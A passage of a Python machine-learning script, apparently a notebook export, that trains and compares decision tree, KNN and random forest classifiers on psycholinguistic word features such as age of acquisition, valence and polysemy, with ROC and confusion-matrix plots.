ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:,1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
#KNN, find best score
acc = []
# Will take some time
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.accuracy_score(y_test, yhat))
clf_knn = KNeighborsClassifier(n_neighbors=acc.index(max(acc)))
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:,1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))
# Instantiate model with 380 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:,1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))
plt.figure(figsize=(8,5))
plt.plot(fpr_0, tpr_0,lw=3,label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en,lw=3,label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN,lw=3,label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF,lw=3,label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
#plt.plot(fpr_c, tpr_c,lw=3,label='$GR_{AUC}$ = %.3f' % (roc_auc_c))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Age of Aquisition (binary)"""
refvar="aoa"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
marker='o',
linestyle='-')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['younger','older'])
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=["younger","older"],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred))
print(classification_report(y_test, y_pred))
y_score = clf_dt_pruned.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
#ROC for Decision Tree (Gini)
fpr_0, tpr_0, th_0 = roc_curve(y_test, y_score[:,1])
roc_auc_0 = auc(fpr_0, tpr_0)
#Entropy
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
print(ideal_ccp_alpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
y_score = clf_dt_pruned.predict_proba(X_test)
fpr_en, tpr_en, th_en = roc_curve(y_test, y_score[:,1])
roc_auc_en = auc(fpr_en, tpr_en)
y_pred = clf_dt_pruned.predict(X_test)
print(classification_report(y_test, y_pred))
#KNN, find best score
acc = []
# Will take some time
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.accuracy_score(y_test, yhat))
clf_knn = KNeighborsClassifier(n_neighbors=acc.index(max(acc)))
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
y_score = clf_knn.predict_proba(X_test)
fpr_KNN, tpr_KNN, th_KNN = roc_curve(y_test, y_score[:,1])
roc_auc_KNN = auc(fpr_KNN, tpr_KNN)
y_pred = clf_knn.predict(X_test)
print(classification_report(y_test, y_pred))
# Instantiate model with 380 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
y_score = model.predict_proba(X_test)
fpr_RF, tpr_RF, th_RF = roc_curve(y_test, y_score[:,1])
roc_auc_RF = auc(fpr_RF, tpr_RF)
y_pred = model.predict(X_test)
print(classification_report(y_test, y_pred))
plt.figure(figsize=(8,5))
plt.plot(fpr_0, tpr_0,lw=3,label='$GINI_{AUC}$ = %.3f' % (roc_auc_0))
plt.plot(fpr_en, tpr_en,lw=3,label='$ENT_{AUC}$ = %.3f' % (roc_auc_en))
plt.plot(fpr_KNN, tpr_KNN,lw=3,label='$KNN_{AUC}$ = %.3f' % (roc_auc_KNN))
plt.plot(fpr_RF, tpr_RF,lw=3,label='$RAF_{AUC}$ = %.3f' % (roc_auc_RF))
#plt.plot(fpr_c, tpr_c,lw=3,label='$GR_{AUC}$ = %.3f' % (roc_auc_c))
plt.legend(loc="lower right", fontsize=18, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Web Corpus Frequency"""
refvar="web_corpus_freq"
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
train_scores = [clf_dt.score(X_train, y_train) for clf_dt in clf_dts]
test_scores = [clf_dt.score(X_test, y_test) for clf_dt in clf_dts]
fig, ax =plt.subplots()
ax.set_xlabel("alpha")
ax.set_ylabel("accuracy")
ax.set_title("Accuracy vs alpha for training and testing sets")
ax.plot(ccp_alphas,train_scores, marker ='o',label='train',drawstyle='steps-post')
ax.plot(ccp_alphas,test_scores, marker ='o',label='test',drawstyle='steps-post')
ax.legend()
plt.show()
alpha_loop_values =[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=0, ccp_alpha=ccp_alpha)
scores= cross_val_score(clf_dt,X_train,y_train, cv=10)
alpha_loop_values.append([ccp_alpha,np.mean(scores), np.std(scores)])
alpha_results = pd.DataFrame(alpha_loop_values,
columns=['alpha','mean_accuracy','std'])
alpha_results.plot(x='alpha',
y='mean_accuracy',
yerr='std',
marker='o',
linestyle='--')
indexmax = alpha_results[['mean_accuracy']].idxmax()
maxalpha=alpha_results.loc[indexmax,'alpha']
ideal_ccp_alpha = float(maxalpha)
clf_dt_pruned = DecisionTreeClassifier(criterion='gini', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42, ccp_alpha=ideal_ccp_alpha)
clf_dt_pruned = clf_dt_pruned.fit(X_train, y_train)
plot_confusion_matrix(clf_dt_pruned,
X_test,
y_test,
display_labels=['4','5','6','7','8','9'],
)
plt.figure(figsize=(15,7.5))
from sklearn.tree import plot_tree
plot_tree(clf_dt_pruned,
filled=True,
rounded=True,
class_names=['4','5','6','7','8','9'],
feature_names=X.columns)
y_pred = clf_dt_pruned.predict(X_train)
y_pred = clf_dt_pruned.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average=None))
print(classification_report(y_test, y_pred))
print(clf_dt_pruned.predict_proba(X_test))
report = classification_report(y_test, y_pred, output_dict=True)
export = pd.DataFrame(report).transpose()
print(export.to_latex())
"""## 3.2 Classification by KNN
### Age of Aquisition
#### choice of k
"""
refvar="aoa"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
k = 4
neigh = KNeighborsClassifier(n_neighbors = k).fit(X_train,y_train)
Pred_y = neigh.predict(X_test)
error_rate = []
for i in range(1,100):
knn = KNeighborsClassifier(n_neighbors=i)
knn.fit(X_train,y_train)
pred_i = knn.predict(X_test)
error_rate.append(np.mean(pred_i != y_test))
plt.figure(figsize=(10,6))
plt.plot(range(1,100),error_rate,color='blue', linestyle='dashed',
marker='o',markerfacecolor='red', markersize=10)
plt.title('Error Rate vs. K Value')
plt.xlabel('K')
plt.ylabel('Error Rate')
print("Minimum error:-",min(error_rate),"at K =",error_rate.index(min(error_rate)))
acc = []
# Will take some time
from sklearn import metrics
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.f1_score(y_test, yhat))
plt.figure(figsize=(10,6))
plt.plot(range(1,40),acc,color = 'blue',linestyle='dashed',
marker='o',markerfacecolor='red', markersize=10)
plt.title('accuracy vs. K Value')
plt.xlabel('K')
plt.ylabel('Accuracy')
print("Maximum accuracy:-",max(acc),"at K =",acc.index(max(acc)))
refvar="aoa"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_knn = KNeighborsClassifier(n_neighbors=error_rate.index(min(error_rate)))
clf_knn.fit(X, y)
# apply KNN to train set
y_pred = clf_knn.predict(X_train)
y_pred[:5]
y_train.values[:5]
print('Accuracy', accuracy_score(y_train, y_pred))
print('F1', f1_score(y_train, y_pred, average='weighted'))
print( classification_report(y_train, y_pred) )
# Confusion matrix for trainset
# TP, FN, FP, TN
confusion_matrix(y_train, y_pred)
# apply KNN to test set
y_pred = clf_knn.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average='weighted'))
print(classification_report(y_test, y_pred))
print(confusion_matrix(y_test, y_pred))
plot_confusion_matrix(clf_knn,
X_test,
y_test,
display_labels=['younger','older'])
y_score = clf_knn.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Valence
#### choice of k
"""
from sklearn.neighbors import KNeighborsClassifier
refvar="valence"
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
k = 4
neigh = KNeighborsClassifier(n_neighbors = k).fit(X_train,y_train)
Pred_y = neigh.predict(X_test)
error_rate = []
for i in range(1,100):
knn = KNeighborsClassifier(n_neighbors=i)
knn.fit(X_train,y_train)
pred_i = knn.predict(X_test)
error_rate.append(np.mean(pred_i != y_test))
plt.figure(figsize=(10,6))
plt.plot(range(1,100),error_rate,color='blue', linestyle='dashed',
marker='o',markerfacecolor='red', markersize=10)
plt.title('Error Rate vs. K Value')
plt.xlabel('K')
plt.ylabel('Error Rate')
print("Minimum error:-",min(error_rate),"at K =",error_rate.index(min(error_rate)))
acc = []
# Will take some time
from sklearn import metrics
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.accuracy_score(y_test, yhat))
plt.figure(figsize=(10,6))
plt.plot(range(1,40),acc,color = 'blue',linestyle='dashed',
marker='o',markerfacecolor='red', markersize=10)
plt.title('accuracy vs. K Value')
plt.xlabel('K')
plt.ylabel('Accuracy')
print("Maximum accuracy:-",max(acc),"at K =",acc.index(max(acc)))
refvar="valence"
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_knn = KNeighborsClassifier(n_neighbors=error_rate.index(min(error_rate)))
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
print('Accuracy', accuracy_score(y_train, y_pred))
print('F1', f1_score(y_train, y_pred, average='weighted'))
print( classification_report(y_train, y_pred) )
confusion_matrix(y_train, y_pred)
y_pred = clf_knn.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average='weighted'))
print(classification_report(y_test, y_pred))
print(confusion_matrix(y_test, y_pred))
plot_confusion_matrix(clf_knn,
X_test,
y_test,
display_labels=['not valuable','valuable'])
y_score = clf_knn.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""### Polysemy
#### choice of k
"""
from sklearn.neighbors import KNeighborsClassifier
refvar="polysemy"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
k = 4
neigh = KNeighborsClassifier(n_neighbors = k).fit(X_train,y_train)
Pred_y = neigh.predict(X_test)
error_rate = []
for i in range(1,100):
knn = KNeighborsClassifier(n_neighbors=i)
knn.fit(X_train,y_train)
pred_i = knn.predict(X_test)
error_rate.append(np.mean(pred_i != y_test))
plt.figure(figsize=(10,6))
plt.plot(range(1,100),error_rate,color='blue', linestyle='dashed',
marker='o',markerfacecolor='red', markersize=10)
plt.title('Error Rate vs. K Value')
plt.xlabel('K')
plt.ylabel('Error Rate')
print("Minimum error:-",min(error_rate),"at K =",error_rate.index(min(error_rate)))
acc = []
# Will take some time
from sklearn import metrics
for i in range(1,40):
neigh = KNeighborsClassifier(n_neighbors = i).fit(X_train,y_train)
yhat = neigh.predict(X_test)
acc.append(metrics.average_precision_score(y_test, yhat))
plt.figure(figsize=(10,6))
plt.plot(range(1,40),acc,color = 'blue',linestyle='dashed',
marker='o',markerfacecolor='red', markersize=10)
plt.title('F1 score vs. K Value')
plt.xlabel('K')
plt.ylabel('F1 Score')
print("Maximum F1:-",max(acc),"at K =",acc.index(max(acc)))
refvar="polysemy"
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_knn = KNeighborsClassifier(n_neighbors=acc.index(max(acc)))
clf_knn.fit(X, y)
y_pred = clf_knn.predict(X_train)
print('Accuracy', accuracy_score(y_train, y_pred))
print('F1', f1_score(y_train, y_pred, average='weighted'))
print( classification_report(y_train, y_pred) )
confusion_matrix(y_train, y_pred)
y_pred = clf_knn.predict(X_test)
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred, average='weighted'))
print(classification_report(y_test, y_pred))
print(confusion_matrix(y_test, y_pred))
plot_confusion_matrix(clf_knn,
X_test,
y_test,
display_labels=['not polysemic','polysemic'])
y_score = clf_knn.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
"""## Random Forest
### Valence
"""
refvar='valence'
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
# Instantiate model with 10 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
#TESTING THE MODEL BY PREDICTING ON TEST DATA
#AND CALCULATE THE ACCURACY SCORE
prediction_test = model.predict(X_test)
#print(y_test, prediction_test)
#Print the prediction accuracy
print ("Accuracy = ", metrics.accuracy_score(y_test, prediction_test))
#Test accuracy for various test sizes and see how it gets better with more training data
#One amazing feature of Random forest is that it provides us info on feature importances
# Get numerical feature importances
#importances = list(model.feature_importances_)
#Let us print them into a nice format.
feature_list = list(X.columns)
feature_imp = pd.Series(model.feature_importances_,index=feature_list).sort_values(ascending=False)
print(feature_imp)
y_pred = model.predict(X_train)
y_pred = model.predict(X_test)
plot_confusion_matrix(ra,
X_test,
y_test,
display_labels=['not val','val'],
)
y_score = model.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
"""### Polysemy"""
refvar='polysemy'
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state = 42)
# Instantiate model with 10 decision trees
model = RandomForestClassifier(n_estimators = 385, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
#TESTING THE MODEL BY PREDICTING ON TEST DATA
#AND CALCULATE THE ACCURACY SCORE
prediction_test = model.predict(X_test)
#print(y_test, prediction_test)
#Print the prediction accuracy
print ("Accuracy = ", metrics.accuracy_score(y_test, prediction_test))
#Test accuracy for various test sizes and see how it gets better with more training data
#One amazing feature of Random forest is that it provides us info on feature importances
# Get numerical feature importances
#importances = list(model.feature_importances_)
#Let us print them into a nice format.
feature_list = list(X.columns)
feature_imp = pd.Series(model.feature_importances_,index=feature_list).sort_values(ascending=False)
print(feature_imp)
y_pred = model.predict(X_train)
y_pred = model.predict(X_test)
plot_confusion_matrix(ra,
X_test,
y_test,
display_labels=['not pol','pol']
)
y_score = model.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
"""### Age of Aquisition"""
refvar='aoa'
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
# Instantiate model with 10 decision trees
model = RandomForestClassifier(n_estimators = 380, random_state = 42)
# Train the model on training data
ra=model.fit(X_train, y_train)
#TESTING THE MODEL BY PREDICTING ON TEST DATA
#AND CALCULATE THE ACCURACY SCORE
prediction_test = model.predict(X_test)
#print(y_test, prediction_test)
#Print the prediction accuracy
print ("Accuracy = ", metrics.accuracy_score(y_test, prediction_test))
#Test accuracy for various test sizes and see how it gets better with more training data
#One amazing feature of Random forest is that it provides us info on feature importances
# Get numerical feature importances
#importances = list(model.feature_importances_)
#Let us print them into a nice format.
feature_list = list(X.columns)
feature_imp = pd.Series(model.feature_importances_,index=feature_list).sort_values(ascending=False)
print(feature_imp)
y_pred = model.predict(X_train)
y_pred = model.predict(X_test)
plot_confusion_matrix(ra,
X_test,
y_test,
display_labels=['younger','older']
)
y_score = model.predict_proba(X_test)
fpr, tpr, th = roc_curve(y_test, y_score[:,1])
roc_auc = auc(fpr, tpr)
print(roc_auc)
plt.figure(figsize=(8,5))
plt.plot(fpr, tpr, label='$AUC$ = %.3f' % (roc_auc))
plt.legend(loc="lower right", fontsize=14, frameon=False)
plt.plot([0,1], [0,1], 'k--')
plt.xlabel('False Positive Rate', fontsize=20)
plt.ylabel('True Positive Rate', fontsize=20)
plt.tick_params(axis='both', which='major', labelsize=22)
plt.show()
print('Accuracy %s' % accuracy_score(y_test, y_pred))
print('F1-score %s' % f1_score(y_test, y_pred,average='weighted'))
print(classification_report(y_test, y_pred))
"""### Out of bag error"""
import matplotlib.pyplot as plt
from collections import OrderedDict
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
RANDOM_STATE = 42
refvar='valence'
taglio=0.67
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
# NOTE: Setting the `warm_start` construction parameter to `True` disables
# support for parallelized ensembles but is necessary for tracking the OOB
# error trajectory during training.
ensemble_clfs = [
(
"RandomForestClassifier, max_features='sqrt'",
RandomForestClassifier(
warm_start=True,
oob_score=True,
max_features="sqrt",
random_state=RANDOM_STATE,
),
),
(
"RandomForestClassifier, max_features='log2'",
RandomForestClassifier(
warm_start=True,
max_features="log2",
oob_score=True,
random_state=RANDOM_STATE,
),
),
(
"RandomForestClassifier, max_features=None",
RandomForestClassifier(
warm_start=True,
max_features=None,
oob_score=True,
random_state=RANDOM_STATE,
),
),
]
# Map a classifier name to a list of (<n_estimators>, <error rate>) pairs.
error_rate = OrderedDict((label, []) for label, _ in ensemble_clfs)
# Range of `n_estimators` values to explore.
min_estimators = 100
max_estimators = 1000
for label, clf in ensemble_clfs:
for i in range(min_estimators, max_estimators + 1, 5):
clf.set_params(n_estimators=i)
clf.fit(X, y)
# Record the OOB error for each `n_estimators=i` setting.
oob_error = 1 - clf.oob_score_
error_rate[label].append((i, oob_error))
# Generate the "OOB error rate" vs. "n_estimators" plot.
for label, clf_err in error_rate.items():
xs, ys = zip(*clf_err)
plt.plot(xs, ys, label=label)
plt.xlim(min_estimators, max_estimators)
plt.xlabel("n_estimators")
plt.ylabel("OOB error rate")
plt.legend(loc="upper right")
plt.show()
"""## Entropy (Decision Tree)
### Age of Acquisition
"""
refvar="aoa"
taglio=0.6
X=df_class_ref.drop(refvar,axis=1).copy()
y=df_class_ref[refvar].copy()
y_up_index = y >= taglio
y[y_up_index]=1
y_zero_index = y < taglio
y[y_zero_index]=0
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=42)
clf_dt = DecisionTreeClassifier(criterion='entropy', max_depth=None, min_samples_split=2, min_samples_leaf=1,random_state=42)
clf_dt = clf_dt.fit(X_train, y_train)
path = clf_dt.cost_complexity_pruning_path(X_train, y_train)
ccp_alphas = path.ccp_alphas
ccp_alphas = ccp_alphas[:-1]
clf_dts=[]
for ccp_alpha in ccp_alphas:
clf_dt = DecisionTreeClassifier(criterion='entropy',random_state=0, ccp_alpha=ccp_alpha)
clf_dt.fit(X_train, y_train)
clf_dts.append(clf_dt)
